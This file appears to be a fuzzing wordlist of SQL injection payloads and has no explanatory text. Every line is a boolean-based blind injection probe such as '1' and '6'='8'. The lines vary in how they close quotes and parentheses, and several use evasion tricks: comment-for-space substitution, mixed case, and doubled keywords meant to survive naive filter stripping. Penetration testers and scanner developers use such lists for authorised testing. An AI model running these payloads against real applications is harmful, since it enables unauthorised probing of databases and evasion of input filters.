1 and 6=8
1' and '6'='8
1" and "6"="8
1)' and '6'='(8
1)" and '6'="(8
1)) and '6'=((8
1))' and '6'='((8
1))" and '6'="((8
1') and '6'=('8
1") and '6'=("8
1')) and '6'=(('8
1")) and '6'=(("8
1 and(6)=8
1' and('6')='8
1" and("6")="8
1)' and('6')='(8
1)" and('6')="(8
1)) and('6')=((8
1))' and('6')='((8
1))" and('6')="((8
1') and('6')=('8
1") and('6')=("8
1')) and('6')=(('8
1")) and('6')=(("8
1 anandd(6)=8
1' anandd('6')='8
1" anandd("6")="8
1)' anandd('6')='(8
1)" anandd('6')="(8
1)) anandd('6')=((8
1))' anandd('6')='((8
1))" anandd('6')="((8
1') anandd('6')=('8
1") anandd('6')=("8
1')) anandd('6')=(('8
1")) aandnd('6')=(("8
1 anD(6)= 8
1' anD('6')= '8
1" anD("6")= "8
1)' anD('6')= '(8
1)" anD('6')= "(8
1)) anD('6')= ((8
1))' anD('6')= '((8
1))" anD('6')= "((8
1') anD('6')= ('8
1") anD('6')= ("8
1')) anD('6')= (('8
1")) anD('6')= (("8
1/**/and/**/6=8
1'/**/and/**/'6'='8
1"/**/and/**/"6"="8
1)'/**/and/**/'6'='(8
1)"/**/and/**/'6'="(8
1))/**/and/**/'6'=((8
1))'/**/and/**/'6'='((8
1))"/**/and/**/'6'="((8
1')/**/and/**/'6'=('8
1")/**/and/**/'6'=("8
1'))/**/and/**/'6'=(('8
1"))/**/and/**/'6'=(("8
1/**/and(6)=8
1'/**/and('6')='8
1"/**/and("6")="8
1)'/**/and('6')='(8
1)"/**/and('6')="(8
1))/**/and('6')=((8
1))'/**/and('6')='((8
1))"/**/and('6')="((8
1')/**/and('6')=('8
1")/**/and('6')=("8
1'))/**/and('6')=(('8
1"))/**/and('6')=(("8
1/**/anandd(6)=8
1'/**/anandd('6')='8
1"/**/anandd("6")="8
1)'/**/anandd('6')='(8
1)"/**/anandd('6')="(8
1))/**/anandd('6')=((8
1))'/**/anandd('6')='((8
1))"/**/anandd('6')="((8
1')/**/anandd('6')=('8
1")/**/anandd('6')=("8
1'))/**/anandd('6')=(('8
1"))/**/aandnd('6')=(("8
1/**/anD(6)=/**/8
1'/**/anD('6')=/**/'8
1"/**/anD("6")=/**/"8
1)'/**/anD('6')=/**/'(8
1)"/**/anD('6')=/**/"(8
1))/**/anD('6')=/**/((8
1))'/**/anD('6')=/**/'((8
1))"/**/anD('6')=/**/"((8
1')/**/anD('6')=/**/('8
1")/**/anD('6')=/**/("8
1'))/**/anD('6')=/**/(('8
1"))/**/anD('6')=/**/(("8
1'  anandd('6')='6

